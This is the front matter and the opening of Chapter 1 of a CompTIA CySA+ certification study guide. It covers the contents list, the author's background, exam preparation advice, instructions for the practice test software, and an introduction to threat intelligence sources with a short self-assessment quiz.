Unified Extensible Firmware Interface (UEFI)
Trusted Foundry
Secure Processing
Trusted Execution
Secure Enclave
Processor Security Extensions
Atomic Execution
Anti-Tamper
Self-Encrypting Drives
Trusted Firmware Updates
Measured Boot and Attestation
Measured Launch
Integrity Measurement Architecture
Bus Encryption
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 11 Analyzing Data as Part of Security
Monitoring Activities
“Do I Know This Already?” Quiz
Foundation Topics
Heuristics
Trend Analysis
Endpoint
Malware
Virus
Worm
Trojan Horse
Logic Bomb
Spyware/Adware
Botnet
Rootkit
Ransomware
Reverse Engineering
Memory
Memory Protection
Secured Memory
Runtime Data Integrity Check
Memory Dumping, Runtime Debugging
System and Application Behavior
Known-good Behavior
Anomalous Behavior
Exploit Techniques
File System
File Integrity Monitoring
User and Entity Behavior Analytics (UEBA)
Network
Uniform Resource Locator (URL) and Domain
Name System (DNS) Analysis
DNS Analysis
Domain Generation Algorithm
Flow Analysis
NetFlow Analysis
Packet and Protocol Analysis
Packet Analysis
Protocol Analysis
Malware
Log Review
Event Logs
Syslog
Kiwi Syslog Server
Firewall Logs
Windows Defender
Cisco Check Point
Web Application Firewall (WAF)
Proxy
Intrusion Detection System (IDS)/Intrusion
Prevention System (IPS)
Sourcefire
Snort
Zeek
HIPS
Impact Analysis
Organization Impact vs. Localized Impact
Immediate Impact vs. Total Impact
Security Information and Event Management (SIEM)
Review
Rule Writing
Known-Bad Internet Protocol (IP)
Dashboard
Query Writing
String Search
Script
Piping
E-mail Analysis
E-mail Spoofing
Malicious Payload
DomainKeys Identified Mail (DKIM)
Sender Policy Framework (SPF)
Domain-based Message Authentication,
Reporting, and Conformance (DMARC)
Phishing
Spear Phishing
Whaling
Forwarding
Digital Signature
E-mail Signature Block
Embedded Links
Impersonation
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 12 Implementing Configuration Changes to
Existing Controls to Improve Security
“Do I Know This Already?” Quiz
Foundation Topics
Permissions
Whitelisting and Blacklisting
Application Whitelisting and Blacklisting
Input Validation
Firewall
NextGen Firewalls
Host-Based Firewalls
Intrusion Prevention System (IPS) Rules
Data Loss Prevention (DLP)
Endpoint Detection and Response (EDR)
Network Access Control (NAC)
Quarantine/Remediation
Agent-Based vs. Agentless NAC
802.1X
Sinkholing
Malware Signatures
Development/Rule Writing
Sandboxing
Port Security
Limiting MAC Addresses
Implementing Sticky MAC
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 13 The Importance of Proactive Threat
Hunting
“Do I Know This Already?” Quiz
Foundation Topics
Establishing a Hypothesis
Profiling Threat Actors and Activities
Threat Hunting Tactics
Hunt Teaming
Threat Model
Executable Process Analysis
Memory Consumption
Reducing the Attack Surface Area
System Hardening
Configuration Lockdown
Bundling Critical Assets
Commercial Business Classifications
Military and Government Classifications
Distribution of Critical Assets
Attack Vectors
Integrated Intelligence
Improving Detection Capabilities
Continuous Improvement
Continuous Monitoring
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 14 Automation Concepts and Technologies
“Do I Know This Already?” Quiz
Foundation Topics
Workflow Orchestration
Scripting
Application Programming Interface (API) Integration
Automated Malware Signature Creation
Data Enrichment
Threat Feed Combination
Machine Learning
Use of Automation Protocols and Standards
Security Content Automation Protocol (SCAP)
Continuous Integration
Continuous Deployment/Delivery
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 15 The Incident Response Process
“Do I Know This Already?” Quiz
Foundation Topics
Communication Plan
Limiting Communication to Trusted Parties
Disclosing Based on Regulatory/Legislative
Requirements
Preventing Inadvertent Release of Information
Using a Secure Method of Communication
Reporting Requirements
Response Coordination with Relevant Entities
Legal
Human Resources
Public Relations
Internal and External
Law Enforcement
Senior Leadership
Regulatory Bodies
Factors Contributing to Data Criticality
Personally Identifiable Information (PII)
Personal Health Information (PHI)
Sensitive Personal Information (SPI)
High Value Assets
Financial Information
Intellectual Property
Patent
Trade Secret
Trademark
Copyright
Securing Intellectual Property
Corporate Information
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 16 Applying the Appropriate Incident
Response Procedure
“Do I Know This Already?” Quiz
Foundation Topics
Preparation
Training
Testing
Documentation of Procedures
Detection and Analysis
Characteristics Contributing to Severity Level
Classification
Downtime and Recovery Time
Data Integrity
Economic
System Process Criticality
Reverse Engineering
Data Correlation
Containment
Segmentation
Isolation
Eradication and Recovery
Vulnerability Mitigation
Sanitization
Reconstruction/Reimaging
Secure Disposal
Patching
Restoration of Permissions
Reconstitution of Resources
Restoration of Capabilities and Services
Verification of Logging/Communication to
Security Monitoring
Post-Incident Activities
Evidence Retention
Lessons Learned Report
Change Control Process
Incident Response Plan Update
Incident Summary Report
Indicator of Compromise (IoC) Generation
Monitoring
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 17 Analyzing Potential Indicators of
Compromise
“Do I Know This Already?” Quiz
Foundation Topics
Network-Related Indicators of Compromise
Bandwidth Consumption
Beaconing
Irregular Peer-to-Peer Communication
Rogue Device on the Network
Scan/Sweep
Unusual Traffic Spike
Common Protocol over Non-standard Port
Host-Related Indicators of Compromise
Processor Consumption
Memory Consumption
Drive Capacity Consumption
Unauthorized Software
Malicious Process
Unauthorized Change
Unauthorized Privilege
Data Exfiltration
Abnormal OS Process Behavior
File System Change or Anomaly
Registry Change or Anomaly
Unauthorized Scheduled Task
Application-Related Indicators of Compromise
Anomalous Activity
Introduction of New Accounts
Unexpected Output
Unexpected Outbound Communication
Service Interruption
Application Log
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 18 Utilizing Basic Digital Forensics
Techniques
“Do I Know This Already?” Quiz
Foundation Topics
Network
Wireshark
tcpdump
Endpoint
Disk
FTK
Helix3
Password Cracking
Imaging
Memory
Mobile
Cloud
Virtualization
Legal Hold
Procedures
EnCase Forensic
Sysinternals
Forensic Investigation Suite
Hashing
Hashing Utilities
Changes to Binaries
Carving
Data Acquisition
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 19 The Importance of Data Privacy and
Protection
“Do I Know This Already?” Quiz
Foundation Topics
Privacy vs. Security
Non-technical Controls
Classification
Ownership
Retention
Data Types
Personally Identifiable Information (PII)
Personal Health Information (PHI)
Payment Card Information
Retention Standards
Confidentiality
Legal Requirements
Data Sovereignty
Data Minimization
Purpose Limitation
Non-disclosure agreement (NDA)
Technical Controls
Encryption
Data Loss Prevention (DLP)
Data Masking
Deidentification
Tokenization
Digital Rights Management (DRM)
Document DRM
Music DRM
Movie DRM
Video Game DRM
E-Book DRM
Watermarking
Geographic Access Requirements
Access Controls
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 20 Applying Security Concepts in Support of
Organizational Risk Mitigation
“Do I Know This Already?” Quiz
Foundation Topics
Business Impact Analysis
Identify Critical Processes and Resources
Identify Outage Impacts and Estimate Downtime
Identify Resource Requirements
Identify Recovery Priorities
Recoverability
Fault Tolerance
Risk Identification Process
Make Risk Determination Based upon Known
Metrics
Qualitative Risk Analysis
Quantitative Risk Analysis
Risk Calculation
Probability
Magnitude
Communication of Risk Factors
Risk Prioritization
Security Controls
Engineering Tradeoffs
MOUs
SLAs
Organizational Governance
Business Process Interruption
Degrading Functionality
Systems Assessment
ISO/IEC 27001
ISO/IEC 27002
Documented Compensating Controls
Training and Exercises
Red Team
Blue Team
White Team
Tabletop Exercise
Supply Chain Assessment
Vendor Due Diligence
OEM Documentation
Hardware Source Authenticity
Trusted Foundry
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 21 The Importance of Frameworks, Policies,
Procedures, and Controls
“Do I Know This Already?” Quiz
Foundation Topics
Frameworks
Risk-Based Frameworks
National Institute of Standards and Technology
(NIST)
COBIT
The Open Group Architecture Framework
(TOGAF)
Prescriptive Frameworks
NIST Cybersecurity Framework Version 1.1
ISO 27000 Series
SABSA
ITIL
Maturity Models
ISO/IEC 27001
Policies and Procedures
Code of Conduct/Ethics
Acceptable Use Policy (AUP)
Password Policy
Data Ownership
Data Retention
Account Management
Continuous Monitoring
Work Product Retention
Category
Managerial
Operational
Technical
Control Type
Preventative
Detective
Corrective
Deterrent
Directive
Physical
Audits and Assessments
Regulatory
Compliance
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 22 Final Preparation
Exam Information
Getting Ready
Tools for Final Preparation
Pearson Test Prep Practice Test Software and
Questions on the Website
Memory Tables
Chapter-Ending Review Tools
Suggested Plan for Final Review/Study
Summary
Appendix A Answers to the “Do I Know This Already?”
Quizzes and Review Questions
Appendix B CompTIA Cybersecurity Analyst (CySA+)
CS0-002 Cert Guide Exam Updates
Glossary of Key Terms
Index
Online Elements:
Appendix C Memory Tables
Appendix D Memory Tables Answer Key
Appendix E Study Planner
Glossary of Key Terms
About the Author
Troy McMillan is a product developer and technical editor for
Kaplan IT as well as a full-time trainer. He became a
professional trainer 20 years ago, teaching Cisco, Microsoft,
CompTIA, and wireless classes. He has written or contributed to
more than a dozen projects, including the following recent ones:
Contributing subject matter expert for CCNA Cisco Certified
Network Associate Certification Exam Preparation Guide (Kaplan)
Author of CISSP Cert Guide (Pearson)
Prep test question writer for CCNA Wireless 640-722 Official Cert
Guide (Cisco Press)
Author of CompTIA Advanced Security Practitioner (CASP) Cert
Guide (Pearson)
Troy has also appeared in the following training videos for
OnCourse Learning: Security+; Network+; Microsoft 70-410,
411, and 412 exam prep; ICND1; and ICND2.
He delivers CISSP training classes for CyberVista, and is an
authorized online training provider for (ISC)2.
Troy also creates certification practice tests and study guides for
CyberVista. He lives in Asheville, North Carolina, with his wife,
Heike.
Dedication
I dedicate this book to my wife, Heike, who has supported me
when I needed it most.
Acknowledgments
I must thank everyone on the Pearson team for all of their help
in making this book better than it would have been without
their help. That includes Chris Cleveland, Nancy Davis, Chris
Crayton, Tonya Simpson, and Mudita Sonar.
About the Technical Reviewer
Chris Crayton (MCSE) is an author, technical consultant, and
trainer. He has worked as a computer technology and
networking instructor, information security director, network
administrator, network engineer, and PC specialist. Chris has
authored several print and online books on PC repair, CompTIA
A+, CompTIA Security+, and Microsoft Windows. He has also
served as technical editor and content contributor on numerous
technical titles for several of the leading publishing companies.
He holds numerous industry certifications, has been recognized
with many professional teaching awards, and has served as a
state-level SkillsUSA competition judge.
We Want to Hear from You!
As the reader of this book, you are our most important critic
and commentator. We value your opinion and want to know
what we’re doing right, what we could do better, what areas
you’d like to see us publish in, and any other words of wisdom
you’re willing to pass our way.
We welcome your comments. You can email to let us know what
you did or didn’t like about this book—as well as what we can do
to make our books better.
Please note that we cannot help you with technical problems
related to the topic of this book.
When you write, please be sure to include this book’s title and
author as well as your name and email address. We will
carefully review your comments and share them with the author
and editors who worked on the book.
Email:
community@informit.com
Reader Services
Register your copy of CompTIA Cybersecurity Analyst (CySA+)
CS0-002 Cert Guide at www.pearsonitcertification.com for
convenient access to downloads, updates, and corrections as
they become available. To start the registration process, go to
www.pearsonitcertification.com/register and log in or create an
account*. Enter the product ISBN 9780136747161 and click
Submit. When the process is complete, you will find any
available bonus content under Registered Products.
*Be sure to check the box that you would like to hear from us to
receive exclusive discounts on future editions of this product.
Introduction
CompTIA CySA+ bridges the skills gap between CompTIA
Security+ and CompTIA Advanced Security Practitioner
(CASP+). Building on CySA+, IT professionals can pursue
CASP+ to prove their mastery of the hands-on cybersecurity
skills required at the 5- to 10-year experience level. Earn the
CySA+ certification to grow your career within the CompTIA
recommended cybersecurity career pathway.
CompTIA CySA+ certification is designed to be a “vendorneutral” exam that measures your knowledge of industrystandard technology.
GOALS AND METHODS
The number-one goal of this book is a simple one: to help you
pass the 2020 version of the CompTIA CySA+ certification
exam, CS0-002.
Because the CompTIA CySA+ certification exam stresses
problem-solving abilities and reasoning more than
memorization of terms and facts, this book is designed to help
you master and understand the required objectives for each
exam.
To aid you in mastering and understanding the CySA+
certification objectives, this book uses the following methods:
The beginning of each chapter identifies the CompTIA CySA+
objective addressed in the chapter and defines the related topics
covered in the chapter.
The body of the chapter explains the topics from a hands-on and
theory-based standpoint. This includes in-depth descriptions,
tables, and figures that are geared toward building your knowledge
so that you can pass the exam. The structure of each chapter
generally follows the outline of the corresponding exam objective,
which not only enables you to study the exam objectives
methodically but also enables you to easily locate coverage of
specific exam objectives that you think you need to review further.
Key Topic icons identify important figures, tables, and lists of
information that you should know for the exam. Key topics are
interspersed throughout the chapter and are listed in a table at the
end of the chapter.
Key terms in each chapter are emphasized in bold italic and are
listed without definitions at the end of each chapter. Write down the
definition of each term and check your work against the complete
key terms in the glossary.
WHO SHOULD READ THIS BOOK?
The CompTIA CySA+ exam is designed for IT security analysts,
vulnerability analysts, and threat intelligence analysts. The
exam certifies that a successful candidate has the knowledge
and skills required to leverage intelligence and threat detection
techniques, analyze and interpret data, identify and address
vulnerabilities, suggest preventative measures, and effectively
respond to and recover from incidents.
The recommended experience for taking the CompTIA CySA+
exam includes Network+, Security+, or equivalent knowledge as
well as a minimum of four years of hands-on information
security or related experience.
This book is for you if you are attempting to attain a position in
the cybersecurity field. It is also for you if you want to keep your
skills sharp or perhaps retain your job due to a company policy
that mandates that you update security skills.
This book is also for you if you want to acquire additional
certifications beyond Network+ or Security+. The book is
designed to offer easy transition to future certification studies.
STRATEGIES FOR EXAM PREPARATION
Strategies for exam preparation vary depending on your existing
skills, knowledge, and equipment available. Of course, the ideal
exam preparation would consist of three or four years of handson security or related experience followed by rigorous study of
the exam objectives.
Before and after you have read through the book, have a look at
the current exam objectives for the CompTIA CySA+
Certification Exam, listed at
https://www.comptia.org/certifications/cybersecurityanalyst#examdetails. If there are any areas shown in the
certification exam outline that you would still like to study, find
those sections in the book and review them.
When you feel confident in your skills, attempt the practice
exams found on the website that accompanies this book. As you
work through the practice exams, note the areas where you lack
confidence and review those concepts or configurations in the
book. After you have reviewed those areas, work through the
practice exams a second time and rate your skills. Keep in mind
that the more you work through the practice exams, the more
familiar the questions will become.
After you have worked through the practice exams a second
time and feel confident in your skills, schedule the CompTIA
CySA+ CS0-002 exam through Pearson Vue
(https://home.pearsonvue.com). To prevent the information
from evaporating out of your mind, you should typically take
the exam within a week of when you consider yourself ready to
take it.
The CompTIA CySA+ certification credential for those passing
the certification exams is now valid for three years. To renew
your certification without retaking the exam, you need to
participate in continuing education (CE) activities and pay an
annual maintenance fee of $50 (that is, $150 for three years).
See https://www.comptia.org/continuing-education/learn/ceprogram-fees for fee details. To learn more about the
certification renewal policy, see
https://certification.comptia.org/continuing-education.
HOW THE BOOK IS ORGANIZED
Table I-1 outlines where each of the CySA+ exam objectives is
covered in the book. For a full dissection of what is covered in
each objective, you should download the most recent set of
objectives from
https://www.comptia.org/certifications/cybersecurityanalyst#examdetails.
Table I-1 CySA+ CS0-002 Exam Objectives: Coverage by
Chapter
Exam
Objective
Chapter Where This Objective Is
Covered
Domain 1.0 Threat and Vulnerability Management
(accounts for 22% of the exam)
1.1 Explain the importance of threat data and
intelligence
Cha
pter
1
1.2 Given a scenario, utilize threat intelligence to
support organizational security
Cha
pter
2
1.3 Given a scenario, perform vulnerability
management activities
Cha
pter
3
1.4 Given a scenario, analyze the output from common
Cha
vulnerability assessment tools
pter
4
1.5 Explain the threats and vulnerabilities associated
with specialized technology
Cha
pter
5
1.6 Explain the threats and vulnerabilities associated
with operating in the cloud
Cha
pter
6
1.7 Given a scenario, implement controls to mitigate
attacks and software vulnerabilities
Cha
pter
7
Domain 2.0 Software and Systems Security (accounts
for 18% of the exam)
2.1 Given a scenario, apply security solutions for
infrastructure management
Cha
pter
8
2.2 Explain software assurance best practices
Cha
pter
9
2.3 Explain hardware assurance best practices
Cha
pter
10
Domain 3.0 Security Operations and Monitoring
(accounts for 25% of the exam)
3.1 Given a scenario, analyze data as part of security
monitoring activities
Cha
pter
11
3.2 Given a scenario, implement configuration
changes to existing controls to improve security
Cha
pter
12
3.3 Explain the importance of proactive threat
hunting
Cha
pter
13
3.4 Compare and contrast automation concepts and
technologies
Cha
pter
14
Domain 4.0 Incident Response (accounts for 22% of
the exam)
4.1 Explain the importance of the incident response
process
Cha
pter
15
4.2 Given a scenario, apply the appropriate incident
response procedure
Cha
pter
16
4.3 Given an incident, analyze potential indicators of
compromise
Cha
pter
17
4.4 Given a scenario, utilize basic digital forensics
techniques
Cha
pter
18
Domain 5.0 Compliance and Assessment (accounts for
13% of the exam)
5.1 Understand the importance of data privacy and
protection
Cha
pter
19
5.2 Given a scenario, apply security concepts in
support of organizational risk mitigation
Cha
pter
20
5.3 Explain the importance of frameworks, policies,
procedures, and controls
Cha
pter
21
BOOK FEATURES
To help you customize your study time using this book, the core
chapters have several features that help you make the best use
of your time:
Foundation Topics: These are the core sections of each chapter.
They explain the concepts for the topics in that chapter.
Exam Preparation Tasks: After the “Foundation Topics” section
of each chapter, the “Exam Preparation Tasks” section provides the
following study activities that you should do to prepare for the
exam:
Review All Key Topics: As previously mentioned, the Key
Topic icon appears next to the most important items in the
“Foundation Topics” section of the chapter. The Review All Key
Topics activity lists the key topics from the chapter, along with
their page numbers. Although the contents of the entire chapter
could be on the exam, you should definitely know the
information listed in each key topic, so you should review these.
Define Key Terms: Although the CySA+ exam might be
unlikely to ask a question such as “Define this term,” the exam
does require that you learn and know a lot of cybersecurityrelated terminology. This section lists the most important terms
from the chapter, asking you to write a short definition of each
and compare your answer to the glossary entry at the end of the
book.
Review Questions: Confirm that you understand the content that
you just covered by answering these questions and reading the
answer explanations.
Web-based practice exam: The companion website includes the
Pearson Test Prep practice test software that enables you to take
practice exam questions. Use it to prepare with a sample exam and
to pinpoint topics where you need more study.
WHAT’S NEW?
With every exam update, changes in the relative emphasis on
certain topics can change. Here is an overview of some of the
most important changes:
Increased content on the importance of threat data and intelligence
Increased emphasis on regulatory compliance
Increased emphasis on the options and combinations available for
any given command
Increased emphasis on identifying attacks through log analysis
Increased coverage of cloud security
Increased coverage of forming and using queries
THE COMPANION WEBSITE FOR ONLINE CONTENT
REVIEW
All the electronic review elements, as well as other electronic
components of the book, exist on this book’s companion
website.
To access the companion website, which gives you access to the
electronic content with this book, start by establishing a login at
www.pearsonITcertification.com and register your book.
To do so, simply go to www.pearsonitcertification.com/register
and enter the ISBN of the print book: 9780136747161. After you
have registered your book, go to your account page and click the
Registered Products tab. From there, click the Access
Bonus Content link to get access to the book’s companion
website.
Note that if you buy the Premium Edition eBook and Practice
Test version of this book from Pearson, your book will
automatically be registered on your account page. Simply go to
your account page, click the Registered Products tab, and
select Access Bonus Content to access the book’s companion
website.
Please note that many of our companion content files can be
very large, especially image and video files.
If you are unable to locate the files for this title by following the
steps at left, please visit
www.pearsonITcertification.com/contact and select the Site
Problems/Comments option. Our customer service
representatives will assist you.
HOW TO ACCESS THE PEARSON TEST PREP
PRACTICE TEST SOFTWARE
You have two options for installing and using the Pearson Test
Prep practice test software: a web app and a desktop app. To use
the Pearson Test Prep application, start by finding the
registration code that comes with the book. You can find the
code in these ways:
Print book: Look in the cardboard sleeve in the back of the book
for a piece of paper with your book’s unique PTP code.
Premium Edition: If you purchase the Premium Edition eBook
and Practice Test directly from the www.pearsonITcertification.com
website, the code will be populated on your account page after
purchase. Just log in to www.pearsonITcertification.com, click
Account to see details of your account, and click the Digital
Purchases tab.
Amazon Kindle: For those who purchase a Kindle edition from
Amazon, the access code will be supplied directly from Amazon.
Other bookseller e-books: Note that if you purchase an e-book
version from any other source, the practice test is not included
because other vendors to date have not chosen to vend the required
unique access code.
Note
Do not lose the activation code because it is the only means with which you can
access the QA content with the book.
Once you have the access code, to find instructions about both
the PTP web app and the desktop app, follow these steps:
Step 1. Open this book’s companion website.
Step 2. Click the Practice Exams button.
Step 3. Follow the instructions listed there both for installing
the desktop app and for using the web app.
Note that if you want to use the web app only at this point, just
navigate to www.pearsontestprep.com, establish a free login if
you do not already have one, and register this book’s practice
tests using the registration code you just found. The process
should take only a couple of minutes.
Note
Amazon eBook (Kindle) customers: It is easy to miss Amazon’s e-mail that lists
your PTP access code. Soon after you purchase the Kindle eBook, Amazon
should send an e-mail. However, the e-mail uses very generic text, and makes
no specific mention of PTP or practice exams. To find your code, read every email from Amazon after you purchase the book. Also do the usual checks for
ensuring your e-mail arrives, like checking your spam folder.
Note
Other eBook customers: As of the time of publication, only the publisher and
Amazon supply PTP access codes when you purchase their eBook editions of
this book.
CUSTOMIZING YOUR EXAMS
Once you are in the exam settings screen, you can choose to take
exams in one of three modes:
Study mode: Enables you to fully customize your exams and
review answers as you are taking the exam. This is typically the
mode you would use first to assess your knowledge and identify
information gaps.
Practice Exam mode: Locks certain customization options, as it
is presenting a realistic exam experience. Use this mode when you
are preparing to test your exam readiness.
Flash Card mode: Strips out the answers and presents you with
only the question stem. This mode is great for late-stage
preparation when you really want to challenge yourself to provide
answers without the benefit of seeing multiple-choice options. This
mode does not provide the detailed score reports that the other two
modes do, so you should not use it if you are trying to identify
knowledge gaps.
In addition to these three modes, you will be able to select the
source of your questions. You can choose to take exams that
cover all of the chapters or you can narrow your selection to just
a single chapter or the chapters that make up specific parts in
the book. All chapters are selected by default. If you want to
narrow your focus to individual chapters, simply deselect all the
chapters and then select only those on which you wish to focus
in the Objectives area.
You can also select the exam banks on which to focus. Each
exam bank comes complete with a full exam of questions that
cover topics in every chapter. You can have the test engine serve
up exams from all test banks or just from one individual bank
by selecting the desired banks in the exam bank area.
There are several other customizations you can make to your
exam from the exam settings screen, such as the time of the
exam, the number of questions served up, whether to
randomize questions and answers, whether to show the number
of correct answers for multiple-answer questions, and whether
to serve up only specific types of questions. You can also create
custom test banks by selecting only questions that you have
marked or questions on which you have added notes.
Updating Your Exams
If you are using the online version of the Pearson Test Prep
software, you should always have access to the latest version of
the software as well as the exam data. If you are using the
Windows desktop version, every time you launch the software
while connected to the Internet, it checks if there are any
updates to your exam data and automatically downloads any
changes that were made since the last time you used the
software.
Sometimes, due to many factors, the exam data might not fully
download when you activate your exam. If you find that figures
or exhibits are missing, you might need to manually update
your exams. To update a particular exam you have already
activated and downloaded, simply click the Tools tab and click
the Update Products button. Again, this is only an issue with
the desktop Windows application.
If you wish to check for updates to the Pearson Test Prep exam
engine software, Windows desktop version, simply click the
Tools tab and click the Update Application button. This
ensures that you are running the latest version of the software
engine.
Credits
Cover image: New Africa/Shutterstock
Chapter opener image: Charlie Edwards/Photodisc/Getty
Images
Figure 3-1 © Greenbone Networks GmbH
Figure 3-2 © Greenbone Networks GmbH
Figure 3-3 © 2020 Tenable, Inc
Figure 3-4 © 2020 Tenable, Inc
Figure 3-5 © 2020 Tenable, Inc
Figure 4-1 © Sarosys LLC 2010-2017
Figure 4-4 © Greenbone Networks GmbH
Figure 4-5 © Greenbone Networks GmbH
Quote, “the process of analyzing a subject system to identify the
system’s components and their interrelationships, and to create
representations of the system in another form or at a higher
level of abstraction” © Institute of Electrical and Electronics
Engineers (IEEE)
Figure 4-7 © Insecure.Com LLC
Figure 4-8 © Insecure.Com LLC
Figure 4-9 © Insecure.Com LLC
Figure 4-10 © Insecure.Com LLC
Figure 4-12 © 2020 KSEC
Figure 4-13 © 2009-2020 Aircrack-ng
Figure 4-14 © hashcat
Figure 4-15 © 2020 HACKING LAND
Figure 5-5 © U.S. Department of Health and Human Services
Figure 11-1 © 2020 Zoho Corp
Figure 11-5 © Microsoft 2020
Figure 11-8 © 2020 SolarWinds Worldwide, LLC
Figure 11-9 © Microsoft 2020
Figure 11-10 © 2020 SolarWinds Worldwide, LLC
Figure 11-11 © Microsoft 2020
Figure 11-13 © 2020 Cloudflare, Inc
Figure 11-14 © Microsoft 2020
Figure 11-15 © 2004-2018 Zentyal S.L.
Figure 11-17 © 1992-2020 Cisco
Figure 11-18 © 1992-2020 Cisco
Figure 11-19 © 2020 Apple Inc
Figure 11-20 © 2020 AT&T CYBERSECURITY
Figure 11-21 © 2005-2020 Splunk Inc.
Figure 13-3 © Microsoft 2020
Figure 13-4 © Microsoft 2020
Figure 17-1 © 2004-2020 Rob Dawson
Figure 17-4 © Microsoft 2020
Figure 17-5 © Microsoft 2020
Figure 18-1 © wireshark
Figure 18-2 © wireshark
Figure 18-3 © wireshark
Figure 18-4 © 2001-2014 Massimiliano Montoro
Figure 18-7 © Microsoft 2020
Figure 19-1 courtesy of Wikipedia
Chapter 1
The Importance of Threat
Data and Intelligence
This chapter covers the following topics related to Objective 1.1
(Explain the importance of threat data and intelligence) of the
CompTIA Cybersecurity Analyst (CySA+) CS0-002 certification
exam:
Intelligence sources: Examines open-source intelligence,
proprietary/closed-source intelligence, timeliness, relevancy, and
accuracy.
Confidence levels: Covers the importance of identifying levels of
confidence in data.
Indicator management: Introduces Structured Threat
Information eXpression (STIX), Trusted Automated eXchange of
Indicator Information (TAXII), and OpenIOC.
Threat classification: Investigates known threats vs. unknown
threats, zero-day threats, and advanced persistent threats.
Threat actors: Identifies actors such as nation-state, hacktivist,
organized crime, and intentional and unintentional insider threats.
Intelligence cycle: Explains the requirements, collection,
analysis, dissemination, and feedback stages.
Commodity malware: Describes the types of malware that
commonly infect networks.
Information sharing and analysis communities: Discusses
data sharing among members of healthcare, financial, aviation,
government, and critical infrastructure communities.
When a war is fought, the gathering and processing of
intelligence information is critical to the success of a campaign.
Likewise, when conducting the daily war that comprises the
defense of an enterprise’s security, threat intelligence can be the
difference between success and failure. This opening chapter
discusses the types of threat intelligence, the sources and
characteristics of such data, and common threat classification
systems. This chapter also discusses the threat cycle, common
malware, and systems of information sharing among
enterprises.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these seven self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 1-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 1-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Question
Intelligence Sources
1
Indicator Management
2
Threat Classification
3
Threat Actors
4
Intelligence Cycle
5
Commodity Malware
6
Information Sharing and Analysis Communities
7
Caution
The goal of self-assessment is to gauge your mastery of the topics in this
chapter. If you do not know the answer to a question or are only partially sure of
the answer, you should mark that question as wrong for purposes of the selfassessment. Giving yourself credit for an answer you correctly guess skews
your self-assessment results and might provide you with a false sense of
security.
1. Which of the following is an example of closed-source
intelligence?
1. Internet blogs and discussion groups
2. Print and online media
3. Unclassified government data
4. Platforms maintained by private organizations
2. Which of the following is an application protocol for
exchanging cyber threat information over HTTPS?
1. TAXII
2. STIX
3. OpenIOC
4. OSINT
3. Which of the following are threats discovered in live
environments that have no current fix or patch?
1. Known threats
2. Zero-day threats
3. Unknown threats
4. Advanced persistent threats
4. Which of the following threat actors uses attacks as a means
to get their message out and affect the businesses that they
feel are detrimental to their cause?
1. Organized crime
2. Terrorist group
3. Hacktivist
4. Insider threat
5. In which stage of the intelligence cycle does most of the hard
work occur?
1. Requirements
2. Collection
3. Dissemination
4. Analysis
6. Malware that is widely available for either purchase or by
free download is called what?
1. Advanced
2. Commodity
3. Bulk
4. Proprietary
7. Which of the following information sharing and analysis
communities is driven by the requirements of HIPAA?
1. H-ISAC
2. Financial Services Information Sharing and Analysis Center
3. Aviation Government Coordinating Council
4. ENISA
FOUNDATION TOPICS
INTELLIGENCE SOURCES
Threat intelligence comes in many forms and can be obtained
from a number of different sources. When gathering this critical
data, the security professional should always classify the
information with respect to its timeliness and relevancy. Let’s
look at some types of threat intelligence and the process of
attaching a confidence level to the data.
Open-Source Intelligence
Open-source intelligence (OSINT) consists of information
that is publicly available to everyone, though not everyone
knows that it is available. OSINT comes from public search
engines, social media sites, newspapers, magazine articles, or
any source that does not limit access to that information.
Examples of these sources include the following:
Print and online media
Internet blogs and discussion groups
Unclassified government data
Academic and professional publications
Industry group data
Papers and reports that are unpublished (gray data)
Proprietary/Closed-Source Intelligence
Proprietary/closed-source intelligence sources are those
that are not publicly available and usually require a fee to
access. Examples of these sources are platforms maintained by
private organizations that supply constantly updating
intelligence information. In many cases this data is developed
from all of the provider’s customers and other sources.
An example of such a platform is offered by CYFIRMA, a market
leader in predictive cyber threat visibility and intelligence.
CYFIRMA announced the launch of cloud-based Cyber
Intelligence Analytics Platform (CAP) v2.0. In 2019, using its
proprietary artificial intelligence and machine learning
algorithms, CYFIRMA helped organizations unravel cyber risks
and threats and enable proactive cyber posture management.
Timeliness
One of the considerations when analyzing intelligence data (of
any kind, not just cyber data) is the timeliness of such data.
Obviously, if an organization receives threat data that is two
weeks old, quite likely it is too late to avoid that threat. One of
the attractions of closed-source intelligence is that these
platforms typically provide near real-time alerts concerning
such threats.
Relevancy
Intelligence data can be quite voluminous. The vast majority of
this information is irrelevant to any specific organization. One
of the jobs of the security professional is to ascertain which data
is relevant and which is not. Again, many proprietary platforms
allow for searching and organizing the data to enhance its
relevancy.
Confidence Levels
While timeliness and relevancy are key characterizes to evaluate
with respect to intelligence, the security professional must also
make an assessment as to the confidence level attached to the
data. That is, can it be relied on to predict the future or to shed
light on the past? On a more basic level, is it true? Or was the
data developed to deceive or mislead? Many cyber activities
have as their aim to confuse, deceive, and hide activities.
Accuracy
Finally, the security professional must determine whether the
intelligence is correct (accuracy). Newspapers are full these
days of cases of false intelligence. The most basic example of
this is the hoax email containing a false warning of a malware
infection on the local device. Although the email is false, in
many cases it motivates the user to follow a link to free software
that actually installs malware. Again, many cyber attacks use
false information to misdirect network defenses.
INDICATOR MANAGEMENT
Cybersecurity professionals use indicators of compromise (IOC)
to identify potential threats. IOCs are network events that are
known to either precede or accompany an attack of some sort.
